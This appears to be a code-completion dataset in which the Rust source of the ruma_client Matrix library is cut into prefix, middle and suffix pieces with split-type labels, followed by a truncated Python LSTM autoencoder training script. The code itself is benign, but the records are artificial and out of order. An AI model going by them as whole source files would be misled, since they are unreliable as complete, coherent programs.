//! Beyond these basic convenience methods, `ruma-client` gives you access to the entire Matrix
//! client-server API via the `api` module. Each leaf module under this tree of modules contains
//! the necessary types for one API endpoint. Simply call the module's `call` method, passing it
//! the logged in `Client` and the relevant `Request` type. `call` will return a future that will
//! resolve to the relevant `Response` type.
//!
//! For example:
//!
//! ```no_run
//! # use futures::Future;
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! use std::convert::TryFrom;
//!
//! use ruma_client::api::r0::alias::get_alias;
//! use ruma_identifiers::{RoomAliasId, RoomId};
//!
//! let request = get_alias::Request {
//! room_alias: RoomAliasId::try_from("#example_room:example.com").unwrap(),
//! };
//!
//! let work = get_alias::call(client, request).and_then(|response| {
//! assert_eq!(response.room_id, RoomId::try_from("!n8f893n9:example.com").unwrap());
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
#![deny(
missing_copy_implementations,
missing_debug_implementations,
missing_docs,
warnings
)]
#![warn(
clippy::empty_line_after_outer_attr,
clippy::expl_impl_clone_on_copy,
clippy::if_not_else,
clippy::items_after_statements,
clippy::match_same_arms,
clippy::mem_forget,
clippy::missing_docs_in_private_items,
clippy::mut_mut,
clippy::needless_borrow,
clippy::needless_continue,
clippy::single_match_else,
clippy::unicode_not_nfc,
clippy::use_self,
clippy::used_underscore_binding,
clippy::wrong_pub_self_convention,
clippy::wrong_self_convention
)]
use std::{
convert::TryInto,
str::FromStr,
sync::{Arc, Mutex},
};
use futures::{
future::{Future, FutureFrom, IntoFuture},
stream::{self, Stream},
};
use hyper::{
client::{connect::Connect, HttpConnector},
Client as HyperClient, Uri,
};
#[cfg(feature = "hyper-tls")]
use hyper_tls::HttpsConnector;
#[cfg(feature = "hyper-tls")]
use native_tls::Error as NativeTlsError;
use ruma_api::Endpoint;
use url::Url;
use crate::error::InnerError;
pub use crate::{error::Error, session::Session};
/// Matrix client-server API endpoints.
pub mod api;
mod error;
mod session;
/// A client for the Matrix client-server API.
#[derive(Debug)]
pub struct Client<C: Connect>(Arc<ClientData<C>>);
/// Data contained in Client's Rc
#[derive(Debug)]
struct ClientData<C>
where
C: Connect,
{
/// The URL of the homeserver to connect to.
homeserver_url: Url,
/// The underlying HTTP client.
hyper: HyperClient<C>,
/// User session data.
session: Mutex<Option<Session>>,
}
impl Client<HttpConnector> {
/// Creates a new client for making HTTP requests to the given homeserver.
pub fn new(homeserver_url: Url, session: Option<Session>) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: HyperClient::builder().keep_alive(true).build_http(),
session: Mutex::new(session),
}))
}
/// Get a copy of the current `Session`, if any.
///
/// Useful for serializing and persisting the session to be restored later.
pub fn session(&self) -> Option<Session> {
self.0
.session
.lock()
.expect("session mutex was poisoned")
.clone()
}
}
#[cfg(feature = "tls")]
impl Client<HttpsConnector<HttpConnector>> {
/// Creates a new client for making HTTPS requests to the given homeserver.
pub fn https(homeserver_url: Url, session: Option<Session>) -> Result<Self, NativeTlsError> {
let connector = HttpsConnector::new(4)?;
Ok(Self(Arc::new(ClientData {
homeserver_url,
hyper: { HyperClient::builder().keep_alive(true).build(connector) },
session: Mutex::new(session),
})))
}
}
impl<C> Client<C>
where
C: Connect + 'static,
{
/// Creates a new client using the given `hyper::Client`.
///
/// This allows the user to configure the details of HTTP as desired.
pub fn custom(
hyper_client: HyperClient<C>,
homeserver_url: Url,
session: Option<Session>,
) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: hyper_client,
session: Mutex::new(session),
}))
}
/// Log in with a username and password.
///
/// In contrast to api::r0::session::login::call(), this method stores the
/// session data returned by the endpoint in this client, instead of
/// returning it.
pub fn log_in(
&self,
user: String,
password: String,
device_id: Option<String>,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::session::login;
let data = self.0.clone();
login::call(
self.clone(),
login::Request {
address: None,
login_type: login::LoginType::Password,
medium: None,
device_id,
password,
user,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a guest. In contrast to api::r0::account::register::call(),
/// this method stores the session data returned by the endpoint in this
/// client, instead of returning it.
pub fn register_guest(&self) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::Guest),
password: None,
username: None,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a new user on this server.
///
/// In contrast to api::r0::account::register::call(), this method stores
/// the session data returned by the endpoint in this client, instead of
/// returning it.
///
/// The username is the local part of the returned user_id. If it is
/// omitted from this request, the server will generate one.
pub fn register_user(
&self,
username: Option<String>,
password: String,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::User),
password: Some(password),
username,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Convenience method that represents repeated calls to the sync_events endpoint as a stream.
///
/// If the since parameter is None, the first Item might take a significant time to arrive and
/// be deserialized, because it contains all events that have occured in the whole lifetime of
/// the logged-in users account and are visible to them.
pub fn sync(
&self,
filter: Option<api::r0::sync::sync_events::Filter>, | set_presence: bool,
) -> impl Stream<Item = api::r0::sync::sync_events::Response, Error = Error> {
use crate::api::r0::sync::sync_events;
let client = self.clone();
let set_presence = if set_presence {
None
} else {
Some(sync_events::SetPresence::Offline)
};
stream::unfold(since, move |since| {
Some(
sync_events::call(
client.clone(),
sync_events::Request {
filter: filter.clone(),
since,
full_state: None,
set_presence: set_presence.clone(),
timeout: None,
},
)
.map(|res| {
let next_batch_clone = res.next_batch.clone();
(res, Some(next_batch_clone))
}),
)
})
}
/// Makes a request to a Matrix API endpoint.
pub(crate) fn request<E>(
self,
request: <E as Endpoint>::Request,
) -> impl Future<Item = E::Response, Error = Error>
where
E: Endpoint,
{
let data1 = self.0.clone();
let data2 = self.0.clone();
let mut url = self.0.homeserver_url.clone();
request
.try_into()
.map_err(Error::from)
.into_future()
.and_then(move |hyper_request| {
{
let uri = hyper_request.uri();
url.set_path(uri.path());
url.set_query(uri.query());
if E::METADATA.requires_authentication {
if let Some(ref session) = *data1.session.lock().unwrap() {
url.query_pairs_mut()
.append_pair("access_token", &session.access_token);
} else {
return Err(Error(InnerError::AuthenticationRequired));
}
}
}
Uri::from_str(url.as_ref())
.map(move |uri| (uri, hyper_request))
.map_err(Error::from)
})
.and_then(move |(uri, mut hyper_request)| {
*hyper_request.uri_mut() = uri;
data2.hyper.request(hyper_request).map_err(Error::from)
})
.and_then(|hyper_response| {
E::Response::future_from(hyper_response).map_err(Error::from)
})
}
}
impl<C: Connect> Clone for Client<C> {
fn clone(&self) -> Self {
Self(self.0.clone())
}
} | since: Option<String>, | random_line_split |
lib.rs | //! Crate `ruma_client` is a [Matrix](https://matrix.org/) client library.
//!
//! # Usage
//!
//! Begin by creating a `Client` type, usually using the `https` method for a client that supports
//! secure connections, and then logging in:
//!
//! ```no_run
//! use futures::Future;
//! use ruma_client::Client;
//!
//! let homeserver_url = "https://example.com".parse().unwrap();
//! let client = Client::https(homeserver_url, None).unwrap();
//!
//! let work = client
//! .log_in("@alice:example.com".to_string(), "secret".to_string(), None)
//! .and_then(|session| {
//! // You're now logged in! Write the session to a file if you want to restore it later.
//! // Then start using the API!
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! You can also pass an existing session to the `Client` constructor to restore a previous session
//! rather than calling `log_in`.
//!
//! For the standard use case of synchronizing with the homeserver (i.e. getting all the latest
//! events), use the `Client::sync`:
//!
//! ```no_run
//! # use futures::{Future, Stream};
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! let work = client.sync(None, None, true).map(|response| {
//! // Do something with the data in the response...
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! The `Client` type also provides methods for registering a new account if you don't already have
//! one with the given homeserver.
//!
//! Beyond these basic convenience methods, `ruma-client` gives you access to the entire Matrix
//! client-server API via the `api` module. Each leaf module under this tree of modules contains
//! the necessary types for one API endpoint. Simply call the module's `call` method, passing it
//! the logged in `Client` and the relevant `Request` type. `call` will return a future that will
//! resolve to the relevant `Response` type.
//!
//! For example:
//!
//! ```no_run
//! # use futures::Future;
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! use std::convert::TryFrom;
//!
//! use ruma_client::api::r0::alias::get_alias;
//! use ruma_identifiers::{RoomAliasId, RoomId};
//!
//! let request = get_alias::Request {
//! room_alias: RoomAliasId::try_from("#example_room:example.com").unwrap(),
//! };
//!
//! let work = get_alias::call(client, request).and_then(|response| {
//! assert_eq!(response.room_id, RoomId::try_from("!n8f893n9:example.com").unwrap());
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
#![deny(
missing_copy_implementations,
missing_debug_implementations,
missing_docs,
warnings
)]
#![warn(
clippy::empty_line_after_outer_attr,
clippy::expl_impl_clone_on_copy,
clippy::if_not_else,
clippy::items_after_statements,
clippy::match_same_arms,
clippy::mem_forget,
clippy::missing_docs_in_private_items,
clippy::mut_mut,
clippy::needless_borrow,
clippy::needless_continue,
clippy::single_match_else,
clippy::unicode_not_nfc,
clippy::use_self,
clippy::used_underscore_binding,
clippy::wrong_pub_self_convention,
clippy::wrong_self_convention
)]
use std::{
convert::TryInto,
str::FromStr,
sync::{Arc, Mutex},
};
use futures::{
future::{Future, FutureFrom, IntoFuture},
stream::{self, Stream},
};
use hyper::{
client::{connect::Connect, HttpConnector},
Client as HyperClient, Uri,
};
#[cfg(feature = "hyper-tls")]
use hyper_tls::HttpsConnector;
#[cfg(feature = "hyper-tls")]
use native_tls::Error as NativeTlsError;
use ruma_api::Endpoint;
use url::Url;
use crate::error::InnerError;
pub use crate::{error::Error, session::Session};
/// Matrix client-server API endpoints.
pub mod api;
mod error;
mod session;
/// A client for the Matrix client-server API.
#[derive(Debug)]
pub struct Client<C: Connect>(Arc<ClientData<C>>);
/// Data contained in Client's Rc
#[derive(Debug)]
struct ClientData<C>
where
C: Connect,
{
/// The URL of the homeserver to connect to.
homeserver_url: Url,
/// The underlying HTTP client.
hyper: HyperClient<C>,
/// User session data.
session: Mutex<Option<Session>>,
}
impl Client<HttpConnector> {
/// Creates a new client for making HTTP requests to the given homeserver.
pub fn new(homeserver_url: Url, session: Option<Session>) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: HyperClient::builder().keep_alive(true).build_http(),
session: Mutex::new(session),
}))
}
/// Get a copy of the current `Session`, if any.
///
/// Useful for serializing and persisting the session to be restored later.
pub fn session(&self) -> Option<Session> {
self.0
.session
.lock()
.expect("session mutex was poisoned")
.clone()
}
}
#[cfg(feature = "tls")]
impl Client<HttpsConnector<HttpConnector>> {
/// Creates a new client for making HTTPS requests to the given homeserver.
pub fn https(homeserver_url: Url, session: Option<Session>) -> Result<Self, NativeTlsError> {
let connector = HttpsConnector::new(4)?;
Ok(Self(Arc::new(ClientData {
homeserver_url,
hyper: { HyperClient::builder().keep_alive(true).build(connector) },
session: Mutex::new(session),
})))
}
}
impl<C> Client<C>
where
C: Connect + 'static,
{
/// Creates a new client using the given `hyper::Client`.
///
/// This allows the user to configure the details of HTTP as desired.
pub fn custom(
hyper_client: HyperClient<C>,
homeserver_url: Url,
session: Option<Session>,
) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: hyper_client,
session: Mutex::new(session),
}))
}
/// Log in with a username and password.
///
/// In contrast to api::r0::session::login::call(), this method stores the
/// session data returned by the endpoint in this client, instead of
/// returning it.
pub fn log_in(
&self,
user: String,
password: String,
device_id: Option<String>,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::session::login;
let data = self.0.clone();
login::call(
self.clone(),
login::Request {
address: None,
login_type: login::LoginType::Password,
medium: None,
device_id,
password,
user,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a guest. In contrast to api::r0::account::register::call(),
/// this method stores the session data returned by the endpoint in this
/// client, instead of returning it.
pub fn register_guest(&self) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::Guest),
password: None,
username: None,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a new user on this server.
///
/// In contrast to api::r0::account::register::call(), this method stores
/// the session data returned by the endpoint in this client, instead of
/// returning it.
///
/// The username is the local part of the returned user_id. If it is
/// omitted from this request, the server will generate one.
pub fn register_user(
&self,
username: Option<String>,
password: String,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::User),
password: Some(password),
username,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Convenience method that represents repeated calls to the sync_events endpoint as a stream.
///
/// If the since parameter is None, the first Item might take a significant time to arrive and
/// be deserialized, because it contains all events that have occured in the whole lifetime of
/// the logged-in users account and are visible to them.
pub fn sync(
&self,
filter: Option<api::r0::sync::sync_events::Filter>,
since: Option<String>,
set_presence: bool,
) -> impl Stream<Item = api::r0::sync::sync_events::Response, Error = Error> {
use crate::api::r0::sync::sync_events;
let client = self.clone();
let set_presence = if set_presence {
None
} else {
Some(sync_events::SetPresence::Offline)
};
stream::unfold(since, move |since| {
Some(
sync_events::call(
client.clone(),
sync_events::Request {
filter: filter.clone(),
since,
full_state: None,
set_presence: set_presence.clone(),
timeout: None,
},
)
.map(|res| {
let next_batch_clone = res.next_batch.clone();
(res, Some(next_batch_clone))
}),
)
})
}
/// Makes a request to a Matrix API endpoint.
pub(crate) fn | <E>(
self,
request: <E as Endpoint>::Request,
) -> impl Future<Item = E::Response, Error = Error>
where
E: Endpoint,
{
let data1 = self.0.clone();
let data2 = self.0.clone();
let mut url = self.0.homeserver_url.clone();
request
.try_into()
.map_err(Error::from)
.into_future()
.and_then(move |hyper_request| {
{
let uri = hyper_request.uri();
url.set_path(uri.path());
url.set_query(uri.query());
if E::METADATA.requires_authentication {
if let Some(ref session) = *data1.session.lock().unwrap() {
url.query_pairs_mut()
.append_pair("access_token", &session.access_token);
} else {
return Err(Error(InnerError::AuthenticationRequired));
}
}
}
Uri::from_str(url.as_ref())
.map(move |uri| (uri, hyper_request))
.map_err(Error::from)
})
.and_then(move |(uri, mut hyper_request)| {
*hyper_request.uri_mut() = uri;
data2.hyper.request(hyper_request).map_err(Error::from)
})
.and_then(|hyper_response| {
E::Response::future_from(hyper_response).map_err(Error::from)
})
}
}
impl<C: Connect> Clone for Client<C> {
fn clone(&self) -> Self {
Self(self.0.clone())
}
}
| request | identifier_name |
lib.rs | //! Crate `ruma_client` is a [Matrix](https://matrix.org/) client library.
//!
//! # Usage
//!
//! Begin by creating a `Client` type, usually using the `https` method for a client that supports
//! secure connections, and then logging in:
//!
//! ```no_run
//! use futures::Future;
//! use ruma_client::Client;
//!
//! let homeserver_url = "https://example.com".parse().unwrap();
//! let client = Client::https(homeserver_url, None).unwrap();
//!
//! let work = client
//! .log_in("@alice:example.com".to_string(), "secret".to_string(), None)
//! .and_then(|session| {
//! // You're now logged in! Write the session to a file if you want to restore it later.
//! // Then start using the API!
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! You can also pass an existing session to the `Client` constructor to restore a previous session
//! rather than calling `log_in`.
//!
//! For the standard use case of synchronizing with the homeserver (i.e. getting all the latest
//! events), use the `Client::sync`:
//!
//! ```no_run
//! # use futures::{Future, Stream};
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! let work = client.sync(None, None, true).map(|response| {
//! // Do something with the data in the response...
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! The `Client` type also provides methods for registering a new account if you don't already have
//! one with the given homeserver.
//!
//! Beyond these basic convenience methods, `ruma-client` gives you access to the entire Matrix
//! client-server API via the `api` module. Each leaf module under this tree of modules contains
//! the necessary types for one API endpoint. Simply call the module's `call` method, passing it
//! the logged in `Client` and the relevant `Request` type. `call` will return a future that will
//! resolve to the relevant `Response` type.
//!
//! For example:
//!
//! ```no_run
//! # use futures::Future;
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! use std::convert::TryFrom;
//!
//! use ruma_client::api::r0::alias::get_alias;
//! use ruma_identifiers::{RoomAliasId, RoomId};
//!
//! let request = get_alias::Request {
//! room_alias: RoomAliasId::try_from("#example_room:example.com").unwrap(),
//! };
//!
//! let work = get_alias::call(client, request).and_then(|response| {
//! assert_eq!(response.room_id, RoomId::try_from("!n8f893n9:example.com").unwrap());
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
#![deny(
missing_copy_implementations,
missing_debug_implementations,
missing_docs,
warnings
)]
#![warn(
clippy::empty_line_after_outer_attr,
clippy::expl_impl_clone_on_copy,
clippy::if_not_else,
clippy::items_after_statements,
clippy::match_same_arms,
clippy::mem_forget,
clippy::missing_docs_in_private_items,
clippy::mut_mut,
clippy::needless_borrow,
clippy::needless_continue,
clippy::single_match_else,
clippy::unicode_not_nfc,
clippy::use_self,
clippy::used_underscore_binding,
clippy::wrong_pub_self_convention,
clippy::wrong_self_convention
)]
use std::{
convert::TryInto,
str::FromStr,
sync::{Arc, Mutex},
};
use futures::{
future::{Future, FutureFrom, IntoFuture},
stream::{self, Stream},
};
use hyper::{
client::{connect::Connect, HttpConnector},
Client as HyperClient, Uri,
};
#[cfg(feature = "hyper-tls")]
use hyper_tls::HttpsConnector;
#[cfg(feature = "hyper-tls")]
use native_tls::Error as NativeTlsError;
use ruma_api::Endpoint;
use url::Url;
use crate::error::InnerError;
pub use crate::{error::Error, session::Session};
/// Matrix client-server API endpoints.
pub mod api;
mod error;
mod session;
/// A client for the Matrix client-server API.
#[derive(Debug)]
pub struct Client<C: Connect>(Arc<ClientData<C>>);
/// Data contained in Client's Rc
#[derive(Debug)]
struct ClientData<C>
where
C: Connect,
{
/// The URL of the homeserver to connect to.
homeserver_url: Url,
/// The underlying HTTP client.
hyper: HyperClient<C>,
/// User session data.
session: Mutex<Option<Session>>,
}
impl Client<HttpConnector> {
/// Creates a new client for making HTTP requests to the given homeserver.
pub fn new(homeserver_url: Url, session: Option<Session>) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: HyperClient::builder().keep_alive(true).build_http(),
session: Mutex::new(session),
}))
}
/// Get a copy of the current `Session`, if any.
///
/// Useful for serializing and persisting the session to be restored later.
pub fn session(&self) -> Option<Session> {
self.0
.session
.lock()
.expect("session mutex was poisoned")
.clone()
}
}
#[cfg(feature = "tls")]
impl Client<HttpsConnector<HttpConnector>> {
/// Creates a new client for making HTTPS requests to the given homeserver.
pub fn https(homeserver_url: Url, session: Option<Session>) -> Result<Self, NativeTlsError> {
let connector = HttpsConnector::new(4)?;
Ok(Self(Arc::new(ClientData {
homeserver_url,
hyper: { HyperClient::builder().keep_alive(true).build(connector) },
session: Mutex::new(session),
})))
}
}
impl<C> Client<C>
where
C: Connect + 'static,
{
/// Creates a new client using the given `hyper::Client`.
///
/// This allows the user to configure the details of HTTP as desired.
pub fn custom(
hyper_client: HyperClient<C>,
homeserver_url: Url,
session: Option<Session>,
) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: hyper_client,
session: Mutex::new(session),
}))
}
/// Log in with a username and password.
///
/// In contrast to api::r0::session::login::call(), this method stores the
/// session data returned by the endpoint in this client, instead of
/// returning it.
pub fn log_in(
&self,
user: String,
password: String,
device_id: Option<String>,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::session::login;
let data = self.0.clone();
login::call(
self.clone(),
login::Request {
address: None,
login_type: login::LoginType::Password,
medium: None,
device_id,
password,
user,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a guest. In contrast to api::r0::account::register::call(),
/// this method stores the session data returned by the endpoint in this
/// client, instead of returning it.
pub fn register_guest(&self) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::Guest),
password: None,
username: None,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a new user on this server.
///
/// In contrast to api::r0::account::register::call(), this method stores
/// the session data returned by the endpoint in this client, instead of
/// returning it.
///
/// The username is the local part of the returned user_id. If it is
/// omitted from this request, the server will generate one.
pub fn register_user(
&self,
username: Option<String>,
password: String,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::User),
password: Some(password),
username,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Convenience method that represents repeated calls to the sync_events endpoint as a stream.
///
/// If the since parameter is None, the first Item might take a significant time to arrive and
/// be deserialized, because it contains all events that have occured in the whole lifetime of
/// the logged-in users account and are visible to them.
pub fn sync(
&self,
filter: Option<api::r0::sync::sync_events::Filter>,
since: Option<String>,
set_presence: bool,
) -> impl Stream<Item = api::r0::sync::sync_events::Response, Error = Error> {
use crate::api::r0::sync::sync_events;
let client = self.clone();
let set_presence = if set_presence {
None
} else {
Some(sync_events::SetPresence::Offline)
};
stream::unfold(since, move |since| {
Some(
sync_events::call(
client.clone(),
sync_events::Request {
filter: filter.clone(),
since,
full_state: None,
set_presence: set_presence.clone(),
timeout: None,
},
)
.map(|res| {
let next_batch_clone = res.next_batch.clone();
(res, Some(next_batch_clone))
}),
)
})
}
/// Makes a request to a Matrix API endpoint.
pub(crate) fn request<E>(
self,
request: <E as Endpoint>::Request,
) -> impl Future<Item = E::Response, Error = Error>
where
E: Endpoint,
{
let data1 = self.0.clone();
let data2 = self.0.clone();
let mut url = self.0.homeserver_url.clone();
request
.try_into()
.map_err(Error::from)
.into_future()
.and_then(move |hyper_request| {
{
let uri = hyper_request.uri();
url.set_path(uri.path());
url.set_query(uri.query());
if E::METADATA.requires_authentication |
}
Uri::from_str(url.as_ref())
.map(move |uri| (uri, hyper_request))
.map_err(Error::from)
})
.and_then(move |(uri, mut hyper_request)| {
*hyper_request.uri_mut() = uri;
data2.hyper.request(hyper_request).map_err(Error::from)
})
.and_then(|hyper_response| {
E::Response::future_from(hyper_response).map_err(Error::from)
})
}
}
impl<C: Connect> Clone for Client<C> {
fn clone(&self) -> Self {
Self(self.0.clone())
}
}
| {
if let Some(ref session) = *data1.session.lock().unwrap() {
url.query_pairs_mut()
.append_pair("access_token", &session.access_token);
} else {
return Err(Error(InnerError::AuthenticationRequired));
}
} | conditional_block |
AutoEncoderBasedEvaluation.py | import copy
import numpy as np
import DataLoader
import torch
import seaborn as sns
import matplotlib.pyplot as plt
from scipy import signal
from scipy.signal import find_peaks
from statsmodels import api as sm
from sklearn.preprocessing import MinMaxScaler
from torch import nn
from LstmAutoEncoder import LstmAutoEncoder
from Model import Model
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class LstmAutoEncoderModel(Model):
def __init__(self, windowSize, maxEpoch, paramIndex, learningRate, threshold):
self.windowSize = windowSize
self.maxEpoch = maxEpoch
self.paramIndex = paramIndex
self.learningRate = learningRate
self.threshold = threshold
self.embeddingDim = 128
self.normalData = DataLoader.NormalDataLoader(self.paramIndex, 'train')
self.unstableData = DataLoader.UnstableDataLoader(self.paramIndex, 'test')
self.wantToShuffle = False
self.statistics = {}
def preProcess(self):
print('paramIndex:', self.paramIndex)
stable = self.normalData.data.x_data
# plot distribution [optional]
# sns.distplot(stable, label="train")
# plt.legend()
# plt.show()
# mix max scaler
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
# divide dataset into train set and validation set
trainData, validationData = self.normalData.divideData(stable, self.wantToShuffle)
# remove some data for reshaping
trainDataMissing = trainData.shape[0] % self.windowSize
validationDataMissing = validationData.shape[0] % self.windowSize
if trainDataMissing != 0:
trainData = trainData[: -trainDataMissing]
if validationDataMissing != 0:
validationData = validationData[: -validationDataMissing]
# plot dataset [optional]
print("data shape:", trainData.shape, validationData.shape)
plt.plot(trainData, label="train")
plt.plot(validationData, label="validate")
plt.legend()
# plt.show()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_valid_data.png')
plt.close()
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize) # 12(window)
validationData = validationData.reshape(-1, self.windowSize)
print("data shape:", trainData.shape, validationData.shape)
# collect mean, std
meanOfTrainData, stdOfTrainData = self.collectMeanStd(trainData)
meanOfValidationData, stdOfValidationData = self.collectMeanStd(validationData)
meanOfTrainData += meanOfValidationData
stdOfTrainData += stdOfValidationData
# find cycle of repeated trend
cycle = self.findCycle(stable)
# save statistic values [left tail, right tail, right tail(std), cycle]
self.statistics = {'lowerMean': np.percentile(meanOfTrainData, 5),
'upperMean': np.percentile(meanOfTrainData, 95),
'upperStd': np.percentile(stdOfTrainData, 95), 'cycle': cycle}
# flatten dataset and min-max normalize
trainData = minMaxScaler.transform(trainData.reshape(-1, 1))
validationData = minMaxScaler.transform(validationData.reshape(-1, 1))
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize)
validationData = validationData.reshape(-1, self.windowSize)
trainDataTensor, lengthOfSubsequence, numberOfFeatures = self.convertToTensor(trainData)
validationDataTensor, _, _ = self.convertToTensor(validationData)
return trainDataTensor, validationDataTensor, lengthOfSubsequence, numberOfFeatures
@staticmethod
def findCycle(sequence):
normalizedStable = sequence - np.mean(sequence)
# acf = sm.tsa.acf(normalizedStable, nlags=len(normalizedStable), fft=False) # auto correlation
peaks, _ = find_peaks(normalizedStable.to_numpy().flatten())
if peaks.size < 3:
return None
cycle = np.mean(np.diff(peaks))
return cycle
@staticmethod
def convertToTensor(dataset):
dataset = [torch.tensor(s).unsqueeze(1).float() for s in dataset]
# N, windowSize, 1
numberOfSequences, lengthOfSubsequence, numberOfFeatures = torch.stack(dataset).shape
return dataset, lengthOfSubsequence, numberOfFeatures
@staticmethod
def collectMeanStd(dataset):
meanList, stdList = [], []
for seq in dataset:
meanList.append(seq.mean())
stdList.append(seq.std())
return meanList, stdList
def train(self, train, valid, lengthOfSubsequence, numberOfFeatures):
model = LstmAutoEncoder(lengthOfSubsequence, numberOfFeatures, 128) # why 128??? example 이 140이어서?
model = model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=self.learningRate)
criterion = nn.L1Loss(reduction='sum').to(device)
bestModel = copy.deepcopy(model.state_dict())
bestLoss = np.inf
# early stop epoch: 10% of max epoch
earlyStopThreshold = self.maxEpoch * 0.1
countWithoutImprovement = 0
for epoch in range(1, self.maxEpoch + 1):
model = model.train()
trainLossList = []
for seqTrue in train:
optimizer.zero_grad()
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
loss.backward()
optimizer.step()
trainLossList.append(loss.item())
validLossList = []
model = model.eval()
with torch.no_grad():
for seqTrue in valid:
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
validLossList.append(loss.item())
MeanOfTrainLoss = np.mean(trainLossList)
MeanOfValidLoss = np.mean(validLossList)
if MeanOfValidLoss < bestLoss:
countWithoutImprovement = 0
bestLoss = MeanOfValidLoss
bestModel = copy.deepcopy(model.state_dict())
else:
countWit | if epoch >= 50 and countWithoutImprovement == earlyStopThreshold:
print('Early stopping!')
break
print(f'Epoch {epoch}: train loss {MeanOfTrainLoss} val loss {MeanOfValidLoss}')
model.load_state_dict(bestModel)
# plot result [optional]
fig, axs = plt.subplots(
nrows=2,
ncols=6,
sharex=True,
sharey=True,
figsize=(16, 8)
)
for i, data in enumerate(train[:6]):
self.plotPrediction(data, model, title='Train', ax=axs [0, i])
for i, data in enumerate(valid[:6]):
self.plotPrediction(data, model, title='Valid', ax=axs [1, i])
fig.tight_layout()
